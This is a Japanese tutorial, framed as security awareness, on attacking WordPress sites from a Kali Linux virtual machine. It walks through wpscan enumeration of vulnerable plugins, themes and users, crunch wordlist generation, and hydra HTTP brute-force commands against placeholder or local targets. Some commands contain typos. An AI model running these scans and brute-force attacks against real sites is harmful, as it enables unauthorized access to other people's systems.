年末年始や長期休暇の前後などに不審なメールや電話が多発する
ネット空間でもハッキングなどの攻撃が増え、ワードプレスのサイトも対象で被害が出ているのだ
ハッキングは自動化され簡単なモノなら数分で完了する。
カップラーメン食べる間にハッキングが終わるイメージだから注意してネットを使ってほしい。
これから紹介する内容は、ハッキングの手法を公開している。一般的な攻撃手法を公開する事で技術を陳腐化され利用者や管理者が最低限のセキュリティレベルを上げる事を目的としている。
公式サイトIPA(独立行政法人情報処理推進機構)
これらの手法やソフトへアクセス、ダウンロードなどで起こった、あらゆる損害に我々は一切の責任を負わないし、自己責任で利用する事を了承したものとする。
仮想環境にKali Linuxを導入し攻撃
仮想環境を「VirtualBox」で構築して「Kali Linux」で攻撃を行います。
「VirtualBox」をダウンロード
「サイトにアクセス」し【Download】を選択
「Download VirtualBox」が表示されるので、「Windows hosts」を選択
公式サイトDownload VirtualBox
「Windows hosts」を選択
「VirtualBox-6.1.18-142142-Win」ファイルを選択する
【Next】を選択する
【Next】を選択する
【Next】を選択する
【YES】を選択する
【Installer】を選択する
【インストール】を選択する
【Finish】を選択する
「All supported platforms」 を選択
【OK】を選択する
「Oracle_VM_VirtualBox_Extension_Pack-6.1.18」ファイルを選択する
【インストール】を選択する
【同意します】を選択する
【OK】を選択する
「Kali Linux」をインストール
Kali Linux Downloadsが表示されるので、VirtualBox用のKali Linuxをインストールする。
公式サイトDownload Kali Linux
Kali Linux 64-bit VirtualBox」を選択
「Kali Linux VirtualBox 64-Bit (OVA)」を選択
Download Kali Linux Virtual Images が表示されるので、VirtualBox用のKali Linuxをインストールする。
「kali-linux-2020.4-vmware-amd64」を解凍する
「Kali Linux」の設定
「Oracle VM VirtualBox」ファイルを開く
【ファイル】>【仮想アプライアンスのインポート】を選択する
先ほどダウンロードした「Kali Linux」を選択する
【次へ】を選択する
【同意する】を選択する
インポートが完了
「Kali Linux」の使い方
①【kali-linux-2020.4-vbox-amd64】を選択し、②【設定】を選択する
【ネットワーク】>「ブリッジアダプター」を選択
- 「割り当て」を「ブリッジアダプター」を選択
- 「名前」をWindowsで使用している同じネットワークアダプターを選択する
参考記事:VirtualBoxのドキュメント
対策手順
- PCを再起動し【F10】(OSによってキーは異なる)連打でBIOSに入る。
- 【Security】タブの【Virtualization】を選択する。
- 「Virtualization Technology」を【Enabled】を【Disabled】に変更する。
- 【F10】で保存してBIOSを終了する。
- システムに従って再起動する。
- コントロールパネルから「プログラム」>「プログラムと機能」>「Windowsの機能の有効化または無効化」>「Hyper-Vプラットフォーム」を【☑】にする
- 再度、VirtualBoxのネットワーク設定を行う。
【kali-linux-2020.4-vbox-amd64】をダブルクリック
Linuxが起動してログインする
- 名前:kali
- パスワード:kali
【ロゴ】>【All Application】>【WPScan】を選択する
kali linuxでは、250以上のツールがデフォルトでインストールされています。
- Aircrack-ng (無線LAN攻撃)
- John the Ripper(パスワード奪取)
- metasploit-framework(脆弱性攻撃)
- Burp Suite(webアプリ攻撃)
念のためにWPscanのアップデートを行います。
以下のコマンドを実行します。
wpscan - update
wpscanの使用方法
Webサイトのスキャンを実行
- 検索対象:URL
- オプションを追加:-rua
$ wpscan --url http://localhost --rua
脆弱なプラグインを確認する
- 検索対象:URL
- オプションを追加:-e/–enumerate
- 指定:vp (vulnerable plugins)、ap (all plugins)、p (plugins)
$ wpscan --url http://localhost -e vp
脆弱なテーマを確認する
- 検索対象:URL
- オプションを追加:-e/–enumerate
- 指定:-vt (Vulnerable themes)、vp (vulnerable plugins)、at (All themes)、t (Themes)
$ wpscan --url http://localhost -e vt
ワードプレスのユーザーを列挙させる
- 検索対象:URL
- オプションを追加:-e/–enumerate u
$ wpscan --url http://localhost -eu
総当たり攻撃用に辞書を作る
hydra(HTC-Htdra)を使ってパスワード総当たりで「ブルートフォース攻撃」を試す。crunhを用意て辞書ファイルを作成する必要がある。
crunhで辞書を作成、hydraで辞書を元に総当たりを行います。
【ロゴ】>【All Application】>【crunh】を選択する
パスワード辞書を作成する
crunch 5 5 -o pwlist.txt
ユーザー名辞書を作成する
crunch 5 5 -0 usrlist.txt
【ロゴ】>【All Application】>【crunh】を選択する
- 検索対象:XX.XX.XX.XXはwebサーバのIPアドレスを指定(ftpの場合は”ftp”、sshの場合は”ssh”)
- オプションを追加:-L で認証するユーザを指定、-Pはパスワードファイルを指定
- 指定:-t 同時に当て込む数の指定
hydra -L usrlist.txt -P pwlist.txt XX.XX.XX.XX http-get
デフォルトは16ですが、当て込む数が4の場合は
hydra -t 4 -L usrlist.txt -P pwlist.txt XX.XX.XX.XX http-get
-o オプションの後のpwlist.txtに書き出す
crunch 5 5 -o pwlist.txt
1文字以上6文字以下の小文字のアルファベットでリストを作成
-o オプションの後のpwlist.txtに書き出す
crunch 1 6 -o pwlist.txt
5文字以上5文字以下の数字でリストを作成
-o オプションの後のpwlist.txtに書き出す
crunch 5 5 0123456789 -o pwlist.txt
5文字以上5文字以下の小文字のアルファベットと数字でリストを作成
-o オプションの後のpwlist.txtに書き出す
大小小文字アルファベットと数字の意味のmixalpha-numericを指定
crunch 5 5 -f /usr/share/crunch/charset.lst mixalpha-numeric -o pwlist.txt
終わりに
ハッキングが専門的な知識を必要とするイメージだけど、ツールが公開され自動で攻撃が完了する事に気が抜けたかもしれません
多くの被害を出し続けている攻撃は、5年前や10年前などにシステムの更新をしていなかったり、不用意なリンクURLをクリックしたなど基本的なものが殆どです。
被害に会わない為にも改善を行って下さいね。
本格的に診断を行いたい方は、以下の本が参考になりますよ!
Webセキュリティ担当者のための脆弱性診断スタートガイド 第2版 上野宣が教える新しい情報漏えいを防ぐ技術 [ 上野 宣 ] | ||||
|
コメント